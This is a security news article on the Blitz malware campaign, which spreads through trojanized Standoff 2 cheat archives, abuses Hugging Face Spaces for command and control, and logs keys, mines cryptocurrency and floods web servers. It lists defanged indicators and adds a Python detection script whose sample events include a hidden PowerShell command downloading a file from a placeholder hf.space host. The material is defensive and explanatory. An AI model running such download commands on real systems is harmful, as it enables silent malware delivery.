
Unit 42, the threat intelligence arm of Palo Alto Networks, has uncovered a malware campaign involving Blitz, a stealthy and evolving Windows-based threat that targets unsuspecting gamers using backdoored cheat packages for the popular mobile game Standoff 2. What began as a ploy to lure cheat-seekers has morphed into a multi-stage malware operation that compromises systems, steals sensitive data, and hijacks resources to mine cryptocurrency — all while using legitimate infrastructure, including Hugging Face Spaces, for command and control.
The Blitz malware operation has been distributing malicious cheat packages with filenames like Nerest_CrackBy@sw1zzx_dev.zip and Elysium_CrackBy@sw1zzx_dev.zip, specifically crafted for users of the Android game Standoff 2, which had surpassed 100 million downloads by April 2025.
“These ZIP archives contain backdoored Windows executable (EXE) files… Running the Windows EXE file from the game cheat package retrieves the Blitz downloader behind the scenes,” Unit 42 states.

These trojanized cheats were shared via a Telegram channel (@sw1zzx_dev), operated by the malware author known as sw1zzx, who promoted them through Cyrillic-language posts and embedded videos.
Blitz operates in two distinct stages:
- Downloader (ieapfltr.dll) – Uses PowerShell one-liners to pull the second-stage payload from Hugging Face.
- Bot (Blitz bot) – Injected into RuntimeBroker.exe, the bot is capable of:
  - Keylogging
  - Screenshot capture
  - File transfer (download/upload)
  - DDoS attacks via HTTP flood
  - Cryptojacking using XMRig miner
“Blitz bot performs information-stealing functions like keylogging and screenshot captures. Blitz bot also has a denial-of-service (DoS) function against web servers,” Unit 42 explains.
Notably, the malware features robust anti-sandboxing techniques, checking for VM artifacts, low screen resolutions, CPU counts, and known sandbox registry keys.
In an abuse of legitimate infrastructure, the Blitz malware uses Hugging Face Spaces — typically used to host machine learning apps — as a command-and-control (C2) channel. It also stores malicious payloads like the XMRig miner and bot DLL on the platform.
“Blitz malware abuses Hugging Face Spaces… The malware developer created a social media presence to promote the distribution of these backdoored game cheats,” Unit 42 notes.
One C2 endpoint (hxxps://e445a00fffe335d6dac0ac0fe0a5accc…hf[.]space) links directly to the external IP 176.65.137[.]44, potentially the malware’s admin panel.
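As an added detection example (not code from the Unit 42 report or from the malware), the following Python logic flags the two behaviours described above in constructed endpoint telemetry: a PowerShell command line that fetches content from a Hugging Face Spaces host, and RuntimeBroker.exe opening an outbound connection to such a host. The event field names and the sample events are assumptions loosely modelled on Sysmon process-creation and network-connection records; the space ID is a placeholder.

```python
import re

# Hugging Face hosts named in the report (hf.space) plus the main site. An ML
# workstation may legitimately reach these, so treat matches as triage signals.
HF_HOSTS = ("hf.space", "huggingface.co")

# PowerShell download primitives typically found in one-liner downloaders.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile",
    re.IGNORECASE,
)


def _hf_host(value: str) -> bool:
    """True if the string references one of the Hugging Face hosts."""
    v = value.lower()
    return any(h in v for h in HF_HOSTS)


def check_event(ev: dict) -> list[str]:
    """Return the names of the rules an event matches (empty if clean)."""
    hits = []
    img = ev.get("image", "").lower()
    if ev.get("event") == "process_create":
        cmd = ev.get("command_line", "")
        if img.endswith(("powershell.exe", "pwsh.exe")) and DOWNLOAD_RE.search(cmd) and _hf_host(cmd):
            hits.append("powershell_download_from_hf_space")
    elif ev.get("event") == "network_connect":
        # RuntimeBroker.exe is a Windows broker process with no reason to talk to
        # an ML hosting platform; the report says Blitz bot is injected into it.
        if img.endswith("runtimebroker.exe") and _hf_host(ev.get("dest_host", "")):
            hits.append("runtimebroker_to_hf_space")
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event index, rule name) pairs for every match in the batch."""
    return [(i, r) for i, ev in enumerate(events) for r in check_event(ev)]


# Constructed sample events (not real telemetry); EXAMPLE-SPACE-ID is a placeholder.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://EXAMPLE-SPACE-ID.hf.space/x -OutFile $env:TEMP\\x"'},
    {"event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Process"},
    {"event": "network_connect", "image": r"C:\Windows\System32\RuntimeBroker.exe",
     "dest_host": "EXAMPLE-SPACE-ID.hf.space"},
    {"event": "network_connect", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "huggingface.co"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only the first and third events; the browser reaching huggingface.co and the ordinary PowerShell command are left alone.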
By April 2025, researchers had identified 289 active infections of Blitz malware across 26 countries. Russia, Ukraine, Belarus, and Kazakhstan topped the list.
Following Unit 42’s disclosure in late April, the malware author posted a farewell message on Telegram in May 2025, claiming to have created a “cleaner.exe” tool to remove Blitz.
However, researchers suggest this could be a smokescreen:
“This goodbye statement is likely a cover story to disguise the author’s exit for other reasons.”
While cleaner.exe appears to remove some parts of Blitz, it fails to fully clean the registry due to a typo in the key name.
The Blitz campaign highlights the very real cybersecurity risks of downloading cracked software and game cheats from unofficial sources. The report concludes with a warning:
“Engaging with such software not only violates legal and ethical standards, but this activity also exposes your system to significant security risks, including malware like Blitz.”